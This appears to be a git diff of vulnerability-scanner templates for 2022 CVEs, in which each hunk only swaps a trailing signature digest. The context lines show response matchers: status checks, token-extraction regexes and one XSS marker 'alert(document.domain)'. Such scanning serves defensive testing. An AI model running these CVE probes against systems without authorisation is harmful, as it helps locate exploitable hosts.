4b0a00483046022100d0e52423ec6d754b8f8723f06ea7c5618c52015a850c465d2de76786984876d4022100eb164053b76371d50a85b1e1c9365c7ced5b4fd8fe42b13147ed9bc572d56fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index e101f2a943..d4d5e1b8fe 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009bdf9420eebe5f89546d02e2636a9205afd51a23d61aa9f0ce3cb479cf736ec6022100c6224d1f62ebc4d669182f5d6aa8c67a7ec1bd0fd96a3f08109f3ef01a5ec51c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022044490ad527795bd39acfd0e9a9babe2d189c60ea4bef71897776849f8c5b7326022072cbe1fc28940ed53f1929314df33b67d9e14dd2de69b1d808c45288d85f6bd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index b0f5070c6a..1b2d7158ea 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206518a43efd11e3806902ca8ee9c21097df37ea75b76475693b24c965dfb9ba880220059139d9f61cc25aaab723ce54ed76071407018de041d6ffbeaab2783b95b09a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220638ec4642788a6b041681c71de0373cbf0360d7ace1c10b9bead242bebb3fcc10221009fea38b748eaac764e4790569cbeb22c5595b0026fbba4298cbf3182ffcfebaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index a9e722bfcd..0d72e29e50 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100be001f0b7462eb1e5fbbc009df9e9804c45400d469276f3ca27b0fa2fa5af3970221008bc045e95549343f3dd0fecb781cd14d214ea21b159efc2105296a911bc53202:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220186b7d63348979909d0f8dafa17769e7cd3dddbb530193b707d5428447ff7f9402202fba324bb91596e2162e9777d1261bde7dfe6d4ac63d8f229775d620ae514a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index e28ae16f2a..c22594b545 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -45,5 +45,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and - -# digest: 490a00463044022029054103644dd6b191548a077a912fa7df53b387b273bbe60d6a70b5b5560f53022049bcd81eaf59e8aa77c5ab6cba54addf7b54841236258851cac139457d99af5e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd063d7aa56062ff55e1726e31e5e2710fc8d809338083e461996c96249461c9022100e6adfb225d5f14c5bd145bb6e6747c307cdd77f724435e7139bd60961399f948:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index 07a01957c9..af8f6daedc 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220024e975356ed61ba275b586ce9ee834fd610f94cb661bec6796e9b68bd5d7bb802207700999bbecac16da7a838089dff5bfbc545c328a555f519bd0a9e7f14fb47eb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f54cdac805e0e3f9c4f7edf07e288442967f1096a4eb805d3a3a0a236de6d9c02210089a3328c53e5dd9f018c009b7046e5d97fc67ab04c06a753091d54ea66797fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index c91d32fa40..af6c6e0e8c 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and - -# digest: 4b0a00483046022100e7ba1a1c4a33e2fded68a3dc3db710c47be207a00013b0cf9e0805625b2bb475022100e530aecb060575fcd39a78bcf41edde0e47920dc67baa08dd8d4a016d9c673f3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ab31b5a0036d4745fb588437b6c5e6ca4adce7944e68e0c98660ceb422eb36ae022100be7641a5474cf8266aaf4a5c44954d827bae8c71c5b840450d12af55687477c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 2be8c27df2..0321c18e07 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022006eca18c9a4d51ac26d06839f39106d202faa39e9c4a38ed2b830ae8f5ca49fb02200b37f05ddfd82b28c0274fc6a3c9682418ad8bd7ede23bd6ac6e37d94bf468d1:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022008a52304979985f2a0d4fae2f593c04dca5504e1b11f965b4790e0711947a6ce022011d67c6b9e3000579c70e520bb3840f42087aa3d58ce0c2f5bb55deb573fa556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index bb9f0221e5..2c4c2c42b7 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d5f132496740f72ec277e064f0d5b203cab87b0af6db7221364c3e34c577a181022100dff607d4e9205510f13356491008149c9dd959cec908788e6b9ae8b37e4769d4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203deda29243be86db1d5828693cc97278d16f69cdbf1db833dacd5d45c424393c022100c26cd0a731c3c3319aef559624356f5ae7ddf547f157ef7f6aee85fde9b1c0b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 63f2c93ef2..86c45ebf75 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -167,5 +167,4 @@ http: regex: - name="form_token" value="(.*)" internal: true - -# digest: 490a0046304402205ba8b8c7cc04f72d5a4ff2b01622ff15e027d58374abc833c682001657e74c44022032d4d8fe0ff8cb963140337e37c5ad1eb1be63ada42394a5cc6f6d5b656b49df:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022050c1410bb278bb57f25ef927b6493d4fc91fd8408a17ce9e616618386d42ee91022100869328df5d9248cf82a7c28094bbfb3a7ddadbb2ca038a33f491da48c9158931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index c3f0aa4189..99cdeefd7c 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -83,5 +83,4 @@ http: regex: - 'name="form_token" value="(.*)"' internal: true - -# digest: 4a0a0047304502210080a32d835fdfa047261cb5f4cdfef3e62f3bd4102e5951e8d7d84b6ebfbd12ed0220217352992e5edd311978690f6e933ab71581996c102398081fcb1d25827c2c2e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009be37de580974c53ded533c8c4d2398b19f12474e83f5de6e531dee2fb187e5b0220110fdee31cc9b546c5982aa0a71c7861d0865e18d938dd8c54a39e326a6dff34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index ebb8e8a933..5665a36cf4 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -189,5 +189,4 @@ http: regex: - name="form_token" value="(.*)" internal: true - -# digest: 490a0046304402206218dccba35e5b15a88c65548d3da815c906dededcf90844bb8d88c6a06d048002201a263059994a7dbed5364c99c1bc48f3701aa9d5399cbb9d0d271870fd345249:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ae77f9c45b1445ef3b66c66f7a5db627e0a8543c0c6bc075ab848dff884658402204aa935bb26907801290f5a6acf9eee623a499857f57b52921c9d2d1b7d828753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 72baaaf6c7..d4a0840425 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100adb32d3cd0525749d31007de13b575bef6ce06e760950a553bc84cf0fd83590702202acddf76a9a2dda58af8d99356973c779202e9351bd6e40ec735abe33c01bbaa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f62d6f7fff27d1b76332e6ac85f9dc1169ce692381416c881bcca7aea66c542c0220709c4e0725500582b104b3d0ac5c22f0389fd47db8e9510ec9e8abf05aa8c69f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index 3dfdad35d9..d0e929d2d5 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -70,5 +70,4 @@ http: - '_wpnonce=([0-9a-z]+)' internal: true part: body - -# digest: 4b0a00483046022100b6bd091b8edc186083b7c1fa6097197f5a7950736eb46d164034c009b8abd7a3022100e66a9671e0a61cc068dd3b86ac76083d4495ea06e6ec22fced9e83648ef56893:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220672dc24b899ee011eb5c5d83603cebc414bf0610c640bb63c25a93b4dce4bc0c02206f5e1e7c1e89beccd482d3f85812badd82743bf5d97fec3afa5894a0e5595195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index b2276226f7..9aa9f18304 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 404 - -# digest: 4b0a00483046022100c5739ea62bcb7eed4583af0a8807a0b759422a256c8947978e3c7b6694b7571a0221008d77d0bfee9d1c3a645136ca1fc061e6f4cdec6274b27fa4cf9d8218b33d629a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e989831fe335b02b086c2bca90d0aa4dda68f69ad157e8cd4fd3d9d22ba540810221009969e05a62f7b09d2c1a9468dee70ca1df4cf8ade5ebe9b595605993812c3c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index dce3fd7efe..98aaccfd0b 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 404 - -# digest: 4a0a00473045022065d798d421e4176d45ce23f2df30a2960e579c2be20ee3aa960ef032b83d9f78022100d2366966ebfcce75b106cdb658d36760db5bce1f76e158367a2ea5e9170bb3ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022047d6d07f4702148c3165b4604be5bbb41d530b52154450267b561b0cc9d152f8022100ea9d229722ee140f2eaad30504d143ea038b15eac832e1ec56e7768e958aee9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 3cbe536c68..b018a820f4 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 404 - -# digest: 4b0a00483046022100df5155b3dc33e00eceb96edd85ca62c3bfbdb2ad328cd7ceefefefcb0ad1a122022100db2ee6f580a76b3a313a124fa7302cc4ea7f495115527c7cc51aaa5b7303d812:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022054fcaff30da3c900b785b87b5c6454d4a2e2cfc95b5704e3f365c81c9b223cc102210097dba56463642faa65aba51efac38899e028f0ff67eed3fb9f8a4300b88adf58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index bfaaa0aefc..38484c0ae2 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 404 - -# digest: 4a0a00473045022052ddb0143beff010c259be7506e9983aa9aa805968d2be4bb6fb7c5a1b71f365022100ceedd3e9796e6dba8b6f39c437a95322ff4a049951b288c4d6145d5e5a4445f7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220251345ab921b3834415e5030a0ef91ceeaa94819de8bf5daf6b1376ea1a045860221009f3e487f1b649f1718aeedab485591b24b1deb81f827e9421a646124ed6667e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index b22a3cec8d..5f08427b22 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -41,5 +41,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and - -# digest: 4a0a00473045022100f541174da65c70fcefe16e2c676069bd61b67df1f59dcd2189d6b2ecca3f8cba022028511d36733128190d4ff7be149dbb02805c1afbe94279c5693e60736e9689b7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022054a3d5946867e464a0ed0c1c6f64a5f9d81a88677ba1ad3a536edd469be7c21f022100ddc0a7fc552c3cda02b100e073af40a83e846ec06722bcb9e842f80cd7552a27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 60fd877b25..e998c7c6a6 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b3d284cd778da28d2d587e414b5fd3704f297c5957342b07ce4b0a7c68553e90022100bff86fbd55edf2f443acbb47c381b3399fad6c4116ddbcdc8377e4149bed1334:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dc351ebb1dc5302f3bfc9cbc1fa47305b5bd578a5d012689201ddcf2c2d9810e022004655b580babe7388f1ef787b2e3e7ca5bed6302f52bac3d5caf73a54cffdc28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 1256c4003d..4ef71ba0dd 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008453aee3efa9d8a3c496841eb07bb58c037c650726c36cd773ef782a6e74c8de022063b7aa32ceb6b117175ad565993623e4e47d15223b320553311e2c7a69ea4f89:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ef5fbe368aa352b67d7c40fdac7b1a139defd27a3052c066d65e6069907a4e2a022100d674ed624428b2ae33c308118c9070ac3e23ed7e5ae8e58d8ebf47d77ee0d05b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 863239ce50..862eed0966 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e26dad57a55cdb554b005c892d9b36f8e976b2b58e827de5924be3447b2885ab0220788d8e132c8e9e14fa7b298f1fa5a867016335f20f257080da46570f100d5203:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f39a9f07cbe707ee6aab910b288775c43759b03ce44aa098319843fc941271c4022074edfbb27136583de6d2d27203bcda7384656043feae7d693f27f26329d27233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 0104e41106..189d7c1456 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022065a8fde0cf4d4da3aa57a5a1c53ba1c0f7c365ed77520368bf50a8bf42f87ef7022028e6af03491bd2b090a8fdb8e4851d45187395572fa49c6d75fe71bf4eaf35b1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220474c4474c81f4da96edebe895b3912d0d3631c5650aad1c1920d531cc5ff4c7a022100dcdc7d96fa6763aad656b37503cf4c9d6f82801c18b899f517ba4c81cfb320e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 30f4811405..5dfc66b44e 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205e5d20c7922df69a0eff27e84be4a146036be24b52c459810ae71f665867a76702210089900428d6448a540a32aeeb4fb3a258fff54c64b0be526c3621190d3730ad29:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205c119ba4228a82c8ca0a53ca4ad8fbb73a7d4d8e9932808ad5981ed510deb2e6022028a0ca96d54eb14fdde7ace9a768b44eb3e63e38158d7a28deca11d2219b4835:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index ef9e8a9556..cbbf551278 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206d33c4f5a87ac588a09c4d977d51eb88dd83daf331cbfb3f9776b8adf167d186022050502ed95fceb6e690277ba777b667f1fb5e1df5b02c0849929b94ba95d27a05:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008d809f7345fb803c047b0242871d4b9bcbc789badd0601e3bd6e5b10ac3e2bb302203bd0b9ef0c8bab7deaabd994c9df56f5d6c5d79f7bae794a7faa0900956bd28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 3c6e49dc80..924ae6ca69 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -45,5 +45,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and - -# digest: 490a00463044022072783fca5b4bef13ca91b44dc0fbc7c340856d097130517e13a382aadd3f5eb002207069acf73af587998dedda65ff7677a019f9426721cb0a170a629669a911df49:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204887e0e3d4a0d8b42048c1b3b8b6e8f8c2e38bb0eb995c0a6900904f331975e302206065f8f8a91b818de170de72d5a0c5bf80a4ab7e226c145e67b1bf725fb5d147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 0f5609cfab..f00f34d447 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "panda-repeater-add-new")' condition: and - -# digest: 4a0a00473045022100ca1fc096aaf38b1097cbbf2788eeb07ba59a09f17ff5b6121077f6d42736b77e0220521691685d16adf12299483d556f28ef2fa9cf3b5ae956f8ba4525227f0784d9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d354cd75f74db09e2ccae02c67f4d2144cb07c57c75814c1b394c0ba3b3201c0221008cda626dcaaa2aae5f446de2ca2f22e2b21215baaef7f9e943d388e0974b7d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 0c8f815209..6ef1ce1e04 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -38,5 +38,4 @@ http: part: body words: - "

Interactsh Server

" - -# digest: 4a0a00473045022100d22715b35f191abd61594ccafe5f0081b4ad48c3e030ef6bef4c045539e135e1022006d71b8f29f99514fbdc96aaf28831ef0c4edb26283ac18b979e30e313fe0951:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207c36f5fe311750706e362ad65e8fdd5ff11d2ae00a04cd9bad9682adf9349b2702200e23a5e9e033190701dd99e97927f862c3aacd7af188143351eab13c495d0927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index f2b42fdd25..fd3abdc2fb 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100815dbceb57a884a3606cb4525c4964b73a2632a2e27252069a0bbc054f7679c902200edafbf2305575a36818fad28fd3b727fc4b0ecc967109e389a71f235a75b8d3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ff0d75cf8ca2435d3f35fd5e6cb88d75ae345ba63b2b66a5d0d8a14ee6a41723022100c387995f97c3ed9177ea5c60eee1e202f13fd29adb95bce7b8cf391de4f81055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 2bef544771..a1b2c368a1 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -65,5 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 490a00463044022054231a544f2d50501b50bb280e0bb25172d8f2c5ceee544e023f03e6eda809c702203260135de9b2dfa868df3727136d43a1fa498a8f9b858959b70a1d8a5aa07c76:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022045ed83d44780da02f7ec545e181197efef7c737eac0980f3cd257ff37f51e894022014b69f445a78ea85a0c3ccb372cd29d692bc295cd8c93f50909dcb69b24d20cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 39dc3edc8a..4993861b8b 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100ea4e04c3664347eb292ca64d7e7ecd0614e2890ad5661ebb5951014406f56e5802202cfde12254412a20721b93a032238044f5a4197494852d1d80044426fe852921:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dfa2117229f2cd9de25a1e498cb3e30a64ec8fad45137be74447b52948a0d53a0221009cf930d9428025fd7246fd7400ae2654a548448dd13296220dd0874989ff6287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 3b31f4bbca..de66c71b4e 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100e950303fa369a8add13ed06d3cf9143ff84821451b6a555be139e78f49256b7e0220524c05a12970e36ef23c36191359a30d435f3e2882f80d90e656470b22d33c19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097688cc9c6f4c9d33fddc6536cd852e1e56f5113cab3dafe8b38082ea2ba7de8022044bc53878b987cdd06907f481767f0a58530b00d59a9747e70f68ddd8e440bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index f03731b441..216fd53b97 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4b0a00483046022100d13f5c4912b07c8dd78292aa710cc6fec2d66bf92604d8da22ace14eab9a9e790221009e7ae08ade6e5df4e82922bb4e7e69c42113b753a408ed636b0a51e40bc7affe:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008d44bc96fc32c49825114c0dd20dc8a54bc4ce2b6feb019a704bba39df9f168e022100cbafd8869722ea019fff73a1f2fd2e62b2eef95cf73524524bdbfc904fefb35e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index a231e15341..35f29c78da 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4b0a0048304602210091c28ac5f01e34ed2905d3f6ff845896ea4c9c5dd0d1917b7be083decdddd289022100af44fea13b5db59f967fc9abf42b7dad29de4a99f2a06a67289b6ef08a6f7a7d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ea75c9f53251e5198252e73b854c89df7ce5b1b557bbeeb1388483c673b0116f02200af8c60ee0e0f1fa2b87c04e2e2078156693dee0df861a985f865832db23ee1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index a6f5f6270d..58156dab53 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100c60b2cad3e406bb54e76e51b8f42100f41893bbe27124dcf8d7827051f34edd702205fd9f5479e32dae433e1052cf8b868678adb715cd8884714ea0890dc1b8c2e1d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220592945246ef96f3efad254fb9b5a10741feca01df0105602ba8ea01b25476e02022100dec249e7bcd5d3a1924c8e4d119ebd259ebba42f4197f5d06e631392fad4befb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 605d3bf888..3722daf7b0 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa74e96e09e51fb0353db1b1a164f3f919fb0ce4b8d11e03a4af2426d7d0c89d022100943d2f593d99e7126f8ead1731b33794b8dab1f40ec4f651c6eba01eceef0a0b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022004d0a7d087aa39ef137885afd163fe8a5602b2925152250296b8633daef9eceb022100c9531d1dfb677474fd421dbe7005b4e7f4c69e756be8fcd48a71d60d407bef1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 86e0d503e8..823cad362a 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bf29e098de880efd30d4f2fe88fc7fc1a8d8457c207d92228cbd32d72ed7a4ad022025705633067fb8503fd6a5ae792bf6b794cb1692bb37d9727feff3b44212e795:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ddeae282e0ce9ca4568acb2cf51daf04a7131aec65140da9ad44e984ac9e2303022100e026db78d4210864f9417d93883aeb34e34a06cade5d1113ff6e457b90718b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index f6aecf17db..cdaa13a976 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Post Status 